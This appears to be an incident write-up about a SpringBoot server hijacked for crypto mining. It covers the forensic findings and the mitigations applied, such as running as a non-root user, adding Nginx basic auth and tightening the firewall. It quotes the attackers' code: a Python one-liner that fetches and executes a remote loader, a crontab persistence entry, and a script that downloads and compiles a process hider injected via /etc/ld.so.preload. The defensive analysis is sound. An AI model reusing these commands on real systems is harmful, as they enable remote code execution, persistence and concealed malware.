How a SpringBoot Server Was Hijacked for Crypto Mining and What You Can Do

Server Invasion Mining Process

On a Saturday night the author received an Alibaba Cloud alert about abnormal server behavior. Using

netstat

a suspicious port was found, indicating a possible remote code execution (RCE) on a Java process, likely a rootkit.

The immediate response was to migrate the service to a new instance, shut down the compromised server, and begin forensic analysis.

Invasion Behavior Analysis

The compromised SpringBoot application had been get‑shelled, executing a base64‑encoded Python command that downloaded and ran a script from

http://m.windowsupdatesupport.org/d/loader.py

:

<code>python -c 'import urllib;exec urllib.urlopen("http://m.windowsupdatesupport.org/d/loader.py").read()'</code>

The downloaded script performed the following actions:

Uninstalled security monitoring tools (e.g., Alibaba Cloud Shield).

Killed all

kworkers

processes.

Created a hidden

.git

directory and executed a

kworkers

binary.

The

kworkers

binary is a mining tool; its activity caused a short CPU spike lasting about five minutes.

Server Residual Traces

After rebooting, the following artifacts were discovered:

Crontab entry:

<code># crontab -l
0 2 * * * /xxx/.git/kworkers</code>

(malware scheduled to run daily).

Various files under the malware’s home directory, including

cert_key.pem

and

cert.pem

(public/private keys).

Extensive log output showing downloads of additional payloads, password harvesting, internal network scanning, and attempts to hide processes.

A particularly interesting payload was

hideproc.sh

, which compiles a malicious

libc2.28.so

shared library to inject into

/etc/ld.so.preload

, effectively hiding its processes from tools like

netstat

.

<code>if [ "$EUID" -ne 0 ]; then echo "Please run as root"; else
  if [ `grep libc2.28 /etc/ld.so.preload` ]; then echo "hideproc already done!!"; else
    apt-get update -y
    apt-get install build-essential -y
    yum check-update
    yum install build-essential -y
    dnf groupinstall "Development Tools" -y
    yum group install "Development Tools" -y
    curl http://m.windowsupdatesupport.org/d/processhider.c -o processhider.c
    gcc -Wall -fPIC -shared -o libc2.28.so processhider.c -ldl
    mv libc2.28.so /usr/local/lib/ -f
    grep libc2.28 /etc/ld.so.preload || echo /usr/local/lib/libc2.28.so >> /etc/ld.so.preload
    rm -f processhider.c
  fi
fi</code>

Network logs also revealed a brute‑force attempt from an IP located in Beijing, likely a compromised bot.

Solution

Since the exact vulnerable SpringBoot dependency was not identified, the following mitigation steps were applied:

Reinstall the operating system on the compromised server.

Run the SpringBoot application under a non‑root user.

Enforce basic authentication for the subsystem using

htpasswd

and configure Nginx:

<code>apt install -y apache2-utils
htpasswd /etc/nginx/conf.d/.htpasswd user</code>

<code>server {
  ...
  auth_basic "Subsystem Authentication";
  auth_basic_user_file /etc/nginx/conf.d/.htpasswd;
  ...
}</code>

Restrict outbound connections with firewall rules.

These measures reduce the risk of similar attacks, but identifying and patching the vulnerable library remains essential.

Conclusion

The incident turned out to be a crypto‑mining malware that did not alter server data, thanks to timely alerts from Alibaba Cloud. It serves as a reminder to avoid running services as root, enforce strict firewall policies, maintain security monitoring, and keep regular backups.